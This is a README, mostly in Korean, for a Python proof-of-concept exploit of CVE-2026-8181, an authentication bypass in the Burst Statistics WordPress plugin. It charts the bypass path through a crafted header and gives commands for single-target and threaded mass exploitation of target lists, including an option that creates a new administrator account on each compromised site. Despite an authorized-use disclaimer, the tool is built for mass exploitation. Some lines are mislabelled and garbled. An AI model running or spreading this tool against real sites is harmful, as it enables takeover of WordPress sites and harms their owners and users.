
CVE-2026-8181 PoC: Burst Statistics (3.4.0–3.4.1.1) authentication bypass. Python tool — single & multi-target scans, threaded workers, TXT reports. Authorized testing only. Maintainer: mürrez.
EN: **Burst Statistics**의 인증 우회에 대한 **승인된 보안 테스트**를 위한 통제된 PoC 및 간단한 기술 노트입니다.
TR: **Burst Statistics** 플러그인의 인증 우회에 대한 **승인된 보안 테스트**를 위한 통제된 PoC 및 간단한 기술 요약입니다.
참고: WordPress.org의 200,000+ 활성 설치 수치는 플러그인의 전체 사용자 기반을 나타내며, 모든 사이트가 취약한 버전을 실행 중임을 의미하지 않습니다. 실제 영향은 버전 + 환경(HTTP/애플리케이션 비밀번호 가용성 등)을 확인해야 합니다.
GitHub Flavored Markdown은 저장소에 파일이 없으면 바이너리 GIF를 포함할 수 없습니다. 위의 Typing SVG 스니펫(CDN)은 움직임을 시뮬레이션합니다. 자신의 화면 캡처를 추가하려면:

flowchart LR
A[Client request] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|Mis-handled branch| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: full admin context]
flowchart LR
A[İstek] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|Yanlış dal| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: tam admin bağlamı]
-f 모드에서 -o와 --output-dir은 상호 배타적입니다.
pip3 install requests urllib3
# 단일 사이트, 보고서 파일
python3 CVE-2026-8181.py -u http://lab.local -U admin -o report.txt -k
# 단일 사이트 + 새 관리자 (실험실)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o report.txt -k
# 대량 + 결합 파일 (성공만)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o successes.txt -k
# 대량 + 폴더에 호스트별 파일 (성공만)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k
Password: 필드성공적인 우회는 피해자 사용자의 실제 비밀번호를 유출하지 않습니다 — PoC의 Basic 비밀번호는 가짜입니다. --create-user 가 새 계정을 생성하지 않는 한 Password: 행은 비어 있습니다. 생성된 경우 생성된 비밀번호가 기록됩니다.
서면 승인된 평가 및 자신의 실험실에서만 사용하십시오. 무단 사용은 많은 국가에서 불법입니다. 저자와 이 README의 유지 관리자는 오용에 대해 책임을 지지 않습니다.
| 필드 | 세부 사항 |
|---|
| 취약점 유형 | Burst Statistics의 인증 우회 (CWE-287): 조작된 헤더로 REST 요청을 전체 관리자 컨텍스트로 승격할 수 있습니다. |
| 영향 받는 버전 | 취약: 3.4.0, 3.4.1, 3.4.1.1 · 사용: 3.4.2 이상 |
| 심각도 | CVSS ~9.8 (Critical); 원격, 해당 조건에서 인증 불필요. |
| 이 저장소 | CVE-2026-8181.py — 실험실 자동화: 단일 대상, 대량 목록, 스레드 풀, 선택적 TXT 출력. |
| 기능 | 설명 |
|---|
| 단일 대상 | -u 기본 URL |
| 대량 대상 | -f targets.txt (한 줄에 하나의 URL; # 주석) |
| 동시성 | -j N 워커 (상한 있음) |
| 결합 파일 | -o file.txt — -f 사용 시 성공한 익스플로잇만 추가됨 |
| 호스트별 파일 | --output-dir — 성공한 경우에만 host.txt 생성 (실패는 건너뜀) |
| 새 관리자 | --create-user — REST를 통해 무작위 사용자 생성 (비밀번호는 보고서에 표시됨) |
| TLS (실험실) | -k 인증서 검증 비활성화 (신뢰할 수 있는 실험실 전용) |